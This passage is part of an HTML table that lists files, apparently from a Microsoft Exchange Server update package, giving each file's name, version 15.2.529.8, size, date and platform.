applicable</td></tr><tr><td>Filteringpowershell.dll</td><td>15.2.529.8</td><td>223,096</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Filteringpowershell.format.ps1xml</td><td>Not applicable</td><td>29,652</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Filtermodule.dll</td><td>15.2.529.8</td><td>180,088</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Fipexeuperfctrresource.dll</td><td>15.2.529.8</td><td>15,232</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Fipexeventsresource.dll</td><td>15.2.529.8</td><td>45,136</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Fipexperfctrresource.dll</td><td>15.2.529.8</td><td>32,848</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Firewallres.dll</td><td>15.2.529.8</td><td>72,808</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Fms.exe</td><td>15.2.529.8</td><td>1,350,008</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Forefrontactivedirectoryconnector.exe</td><td>15.2.529.8</td><td>110,976</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Fpsdiag.exe</td><td>15.2.529.8</td><td>18,808</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Fsccachedfilemanagedlocal.dll</td><td>15.2.529.8</td><td>822,352</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Fscconfigsupport.dll</td><td>15.2.529.8</td><td>56,904</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Fscconfigurationserver.exe</td><td>15.2.529.8</td><td>430,976</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Fscconfigurationserverinterfaces.dll</td><td>15.2.529.8</td><td>15,952</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Fsccrypto.dll</td><td>15.2.529.8</td><td>208,760</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Fscipcinterfaceslocal.dll</td><td>15.2.529.8</td><td>28,752</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Fscipclocal.dll</td><td>15.2.529.8</td><td>38,264</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Fscsqmuploader.exe</td><td>15.2.529.8</td><td>453,712</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Getucpool.ps1</td><td>Not applicable</td><td>20,071</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Getvalidengines.ps1</td><td>Not applicable</td><td>13,270</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Get_antispamfilteringreport.ps1</td><td>Not applicable</td><td>16,089</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Get_antispamsclhistogram.ps1</td><td>Not applicable</td><td>14,635</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Get_antispamtopblockedsenderdomains.ps1</td><td>Not applicable</td><td>15,707</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Get_antispamtopblockedsenderips.ps1</td><td>Not applicable</td><td>14,755</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Get_antispamtopblockedsenders.ps1</td><td>Not applicable</td><td>15,778</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Get_antispamtoprblproviders.ps1</td><td>Not applicable</td><td>14,985</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Get_antispamtoprecipients.ps1</td><td>Not applicable</td><td>14,794</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Get_dleligibilitylist.ps1</td><td>Not applicable</td><td>42,668</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Get_exchangeetwtrace.ps1</td><td>Not applicable</td><td>29,243</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Get_publicfoldermailboxsize.ps1</td><td>Not applicable</td><td>15,022</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Get_storetrace.ps1</td><td>Not applicable</td><td>51,867</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Huffman_xpress.dll</td><td>15.2.529.8</td><td>32,632</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Importedgeconfig.ps1</td><td>Not applicable</td><td>77,244</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Import_mailpublicfoldersformigration.ps1</td><td>Not applicable</td><td>29,776</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Import_retentiontags.ps1</td><td>Not applicable</td><td>29,114</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Inproxy.dll</td><td>15.2.529.8</td><td>85,880</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Installwindowscomponent.ps1</td><td>Not applicable</td><td>34,523</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Install_antispamagents.ps1</td><td>Not applicable</td><td>17,909</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Install_odatavirtualdirectory.ps1</td><td>Not applicable</td><td>17,959</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Interop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc</td><td>15.2.529.8</td><td>107,384</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Interop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc</td><td>15.2.529.8</td><td>20,344</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Interop.certenroll.dll</td><td>15.2.529.8</td><td>142,928</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Interop.licenseinfointerface.dll</td><td>15.2.529.8</td><td>14,208</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Interop.netfw.dll</td><td>15.2.529.8</td><td>34,384</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Interop.plalibrary.dll</td><td>15.2.529.8</td><td>72,776</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Interop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc</td><td>15.2.529.8</td><td>27,000</td><td>01-Jan-2020</td><td>11:22</td><td>Not applicable</td></tr><tr><td>Interop.taskscheduler.dll</td><td>15.2.529.8</td><td>46,672</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Interop.wuapilib.dll</td><td>15.2.529.8</td><td>60,800</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Interop.xenroll.dll</td><td>15.2.529.8</td><td>39,800</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Kerbauth.dll</td><td>15.2.529.8</td><td>63,056</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Licenseinfointerface.dll</td><td>15.2.529.8</td><td>643,448</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Lpversioning.xml</td><td>Not applicable</td><td>19,954</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Mailboxdatabasereseedusingspares.ps1</td><td>Not applicable</td><td>31,900</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Managedavailabilitycrimsonmsg.dll</td><td>15.2.529.8</td><td>138,624</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Managedstorediagnosticfunctions.ps1</td><td>Not applicable</td><td>126,233</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Managescheduledtask.ps1</td><td>Not applicable</td><td>36,336</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Manage_metacachedatabase.ps1</td><td>Not applicable</td><td>51,334</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Mce.dll</td><td>15.2.529.8</td><td>1,693,264</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Measure_storeusagestatistics.ps1</td><td>Not applicable</td><td>29,483</td><td>01-Jan-2020</td><td>11:20</td><td>Not applicable</td></tr><tr><td>Merge_publicfoldermailbox.ps1</td><td>Not applicable</td><td>22,623</td><td>01-Jan-2020</td><td>11:21</td><td>Not applicable</td></tr><tr><td>Microsoft.database.isam.dll</td><td>15.2.529.8</td><td>127,864</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.dkm.proxy.dll</td><td>15.2.529.8</td><td>25,984</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.activemonitoring.activemonitoringvariantconfig.dll</td><td>15.2.529.8</td><td>68,472</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.activemonitoring.eventlog.dll</td><td>15.2.529.8</td><td>17,792</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.addressbook.service.dll</td><td>15.2.529.8</td><td>233,344</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.addressbook.service.eventlog.dll</td><td>15.2.529.8</td><td>15,736</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.airsync.airsyncmsg.dll</td><td>15.2.529.8</td><td>43,384</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.airsync.comon.dll</td><td>15.2.529.8</td><td>1,776,232</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.airsync.dll1</td><td>15.2.529.8</td><td>505,416</td><td>01-Jan-2020</td><td>11:19</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.airsynchandler.dll</td><td>15.2.529.8</td><td>76,152</td><td>01-Jan-2020</td><td>11:25</td><td>x86</td></tr><tr><td>Microsoft.exchange.anchorservice.dll</td><td>15.2.529.8</td><td>135,552</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.antispam.eventlog.dll</td><td>15.2.529.8</td><td>23,424</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.antispamupdate.eventlog.dll</td><td>15.2.529.8</td><td>15,736</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.antispamupdatesvc.exe</td><td>15.2.529.8</td><td>27,216</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.approval.applications.dll</td><td>15.2.529.8</td><td>53,632</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.assistants.dll</td><td>15.2.529.8</td><td>925,056</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.assistants.eventlog.dll</td><td>15.2.529.8</td><td>26,192</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.assistants.interfaces.dll</td><td>15.2.529.8</td><td>43,384</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.audit.azureclient.dll</td><td>15.2.529.8</td><td>15,224</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.auditlogsearch.eventlog.dll</td><td>15.2.529.8</td><td>14,712</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.auditlogsearchservicelet.dll</td><td>15.2.529.8</td><td>70,520</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.auditstoragemonitorservicelet.dll</td><td>15.2.529.8</td><td>94,592</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.auditstoragemonitorservicelet.eventlog.dll</td><td>15.2.529.8</td><td>13,176</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.authadmin.eventlog.dll</td><td>15.2.529.8</td><td>15,744</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.authadminservicelet.dll</td><td>15.2.529.8</td><td>36,944</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.authservicehostservicelet.dll</td><td>15.2.529.8</td><td>15,736</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.autodiscover.configuration.dll</td><td>15.2.529.8</td><td>79,736</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.autodiscover.dll</td><td>15.2.529.8</td><td>396,160</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.autodiscover.eventlogs.dll</td><td>15.2.529.8</td><td>21,368</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.autodiscoverv2.dll</td><td>15.2.529.8</td><td>57,424</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.bandwidthmonitorservicelet.dll</td><td>15.2.529.8</td><td>14,712</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.batchservice.dll</td><td>15.2.529.8</td><td>35,704</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.cabutility.dll</td><td>15.2.529.8</td><td>276,352</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.certificatedeployment.eventlog.dll</td><td>15.2.529.8</td><td>16,456</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.certificatedeploymentservicelet.dll</td><td>15.2.529.8</td><td>25,976</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.certificatenotification.eventlog.dll</td><td>15.2.529.8</td><td>13,688</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.certificatenotificationservicelet.dll</td><td>15.2.529.8</td><td>23,416</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.common.dll</td><td>15.2.529.8</td><td>376,704</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.eventlogs.dll</td><td>15.2.529.8</td><td>83,840</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.clients.owa.dll</td><td>15.2.529.8</td><td>2,971,008</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.owa2.server.dll</td><td>15.2.529.8</td><td>5,029,752</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.owa2.servervariantconfiguration.dll</td><td>15.2.529.8</td><td>893,816</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.security.dll</td><td>15.2.529.8</td><td>413,776</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.strings.dll</td><td>15.2.529.8</td><td>924,544</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.bandwidthmonitor.dll</td><td>15.2.529.8</td><td>31,824</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.common.dll</td><td>15.2.529.8</td><td>52,296</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.common.extensions.dll</td><td>15.2.529.8</td><td>21,888</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.diskmonitor.dll</td><td>15.2.529.8</td><td>33,656</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.replay.dll</td><td>15.2.529.8</td><td>3,515,264</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.replicaseeder.dll</td><td>15.2.529.8</td><td>108,616</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.cluster.replicavsswriter.dll</td><td>15.2.529.8</td><td>288,632</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.cluster.shared.dll</td><td>15.2.529.8</td><td>625,744</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.agentconfig.transport.dll</td><td>15.2.529.8</td><td>86,400</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.componentconfig.transport.dll</td><td>15.2.529.8</td><td>1,831,504</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.adagentservicevariantconfig.dll</td><td>15.2.529.8</td><td>31,608</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.directoryvariantconfig.dll</td><td>15.2.529.8</td><td>465,792</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.domtvariantconfig.dll</td><td>15.2.529.8</td><td>25,464</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.ismemberofresolverconfig.dll</td><td>15.2.529.8</td><td>38,272</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.tenantrelocationvariantconfig.dll</td><td>15.2.529.8</td><td>102,776</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.topologyservicevariantconfig.dll</td><td>15.2.529.8</td><td>48,504</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.diskmanagement.dll</td><td>15.2.529.8</td><td>67,448</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.dll</td><td>15.2.529.8</td><td>172,920</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.encryption.variantconfig.dll</td><td>15.2.529.8</td><td>113,528</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.il.dll</td><td>15.2.529.8</td><td>13,904</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.inference.dll</td><td>15.2.529.8</td><td>130,424</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.optics.dll</td><td>15.2.529.8</td><td>63,864</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.processmanagermsg.dll</td><td>15.2.529.8</td><td>19,832</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.common.protocols.popimap.dll</td><td>15.2.529.8</td><td>15,440</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.search.dll</td><td>15.2.529.8</td><td>108,920</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.search.eventlog.dll</td><td>15.2.529.8</td><td>17,792</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.common.smtp.dll</td><td>15.2.529.8</td><td>51,576</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll</td><td>15.2.529.8</td><td>36,728</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.transport.azure.dll</td><td>15.2.529.8</td><td>27,512</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.transport.monitoringconfig.dll</td><td>15.2.529.8</td><td>1,042,512</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.commonmsg.dll</td><td>15.2.529.8</td><td>29,264</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.auditlogpumper.messages.dll</td><td>15.2.529.8</td><td>13,176</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.auditservice.core.dll</td><td>15.2.529.8</td><td>181,328</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.auditservice.messages.dll</td><td>15.2.529.8</td><td>30,080</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.common.dll</td><td>15.2.529.8</td><td>22,400</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.crimsonevents.dll</td><td>15.2.529.8</td><td>85,880</td><td>01-Jan-2020</td><td>11:21</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.dll</td><td>15.2.529.8</td><td>41,336</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.recordreview.dll</td><td>15.2.529.8</td><td>37,248</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.supervision.dll</td><td>15.2.529.8</td><td>50,768</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskcreator.dll</td><td>15.2.529.8</td><td>33,144</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskdistributioncommon.dll</td><td>15.2.529.8</td><td>1,100,152</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskdistributionfabric.dll</td><td>15.2.529.8</td><td>206,712</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskplugins.dll</td><td>15.2.529.8</td><td>210,816</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.compression.dll</td><td>15.2.529.8</td><td>17,280</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.certificateauth.dll</td><td>15.2.529.8</td><td>37,760</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.certificateauth.eventlog.dll</td><td>15.2.529.8</td><td>14,208</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.core.dll</td><td>15.2.529.8</td><td>145,792</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.core.eventlog.dll</td><td>15.2.529.8</td><td>14,208</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.delegatedauth.dll</td><td>15.2.529.8</td><td>53,112</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.delegatedauth.eventlog.dll</td><td>15.2.529.8</td><td>15,744</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.diagnosticsmodules.dll</td><td>15.2.529.8</td><td>23,632</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.diagnosticsmodules.eventlog.dll</td><td>15.2.529.8</td><td>13,184</td><td>01-Jan-2020</td><td>11:23</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.failfast.dll</td><td>15.2.529.8</td><td>54,648</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.failfast.eventlog.dll</td><td>15.2.529.8</td><td>13,688</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.objectmodel.dll</td><td>15.2.529.8</td><td>1,845,840</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.objectmodel.eventlog.dll</td><td>15.2.529.8</td><td>30,288</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.redirectionmodule.dll</td><td>15.2.529.8</td><td>68,688</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.redirectionmodule.eventlog.dll</td><td>15.2.529.8</td><td>15,440</td><td>01-Jan-2020</td><td>11:19</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll</td><td>15.2.529.8</td><td>21,376</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll</td><td>15.2.529.8</td><td>13,184</td><td>01-Jan-2020</td><td>11:20</td><td>x64</td></tr><tr><td>Microsoft.exchange.connectiondatacollector.dll</td><td>15.2.529.8</td><td>25,976</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.common.dll</td><td>15.2.529.8</td><td>169,856</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.eas.dll</td><td>15.2.529.8</td><td>330,112</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.imap.dll</td><td>15.2.529.8</td><td>174,152</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.pop.dll</td><td>15.2.529.8</td><td>71,240</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.contentfilter.wrapper.exe</td><td>15.2.529.8</td><td>203,640</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.context.client.dll</td><td>15.2.529.8</td><td>27,008</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.context.configuration.dll</td><td>15.2.529.8</td><td>51,576</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.context.core.dll</td><td>15.2.529.8</td><td>51,064</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.context.datamodel.dll</td><td>15.2.529.8</td><td>46,976</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.core.strings.dll</td><td>15.2.529.8</td><td>1,093,496</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.core.timezone.dll</td><td>15.2.529.8</td><td>57,208</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.deep.dll</td><td>15.2.529.8</td><td>326,736</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.dll</td><td>15.2.529.8</td><td>3,352,952</td><td>01-Jan-2020</td><td>11:20</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.eventlog.dll</td><td>15.2.529.8</td><td>35,920</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.monitoring.ifx.dll</td><td>15.2.529.8</td><td>17,792</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.connectors.dll</td><td>15.2.529.8</td><td>165,240</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.consumermailboxprovisioning.dll</td><td>15.2.529.8</td><td>619,600</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.directory.dll</td><td>15.2.529.8</td><td>7,788,624</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.directory.eventlog.dll</td><td>15.2.529.8</td><td>80,488</td><td>01-Jan-2020</td><td>11:22</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.dll</td><td>15.2.529.8</td><td>1,789,312</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.groupmailboxaccesslayer.dll</td><td>15.2.529.8</td><td>1,626,488</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.ha.dll</td><td>15.2.529.8</td><td>375,168</td><td>01-Jan-2020</td><td>11:19</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.imageanalysis.dll</td><td>15.2.529.8</td><td>105,848</td><td>01-Jan-2020</td><td>11:21</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.mailboxfeatures.dll</td><td>15.2.529.8</td><td>15,952</td><td>01-Jan-2020</td><td>11:22</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.mailboxloadbalance.dll</td><td>15.2.5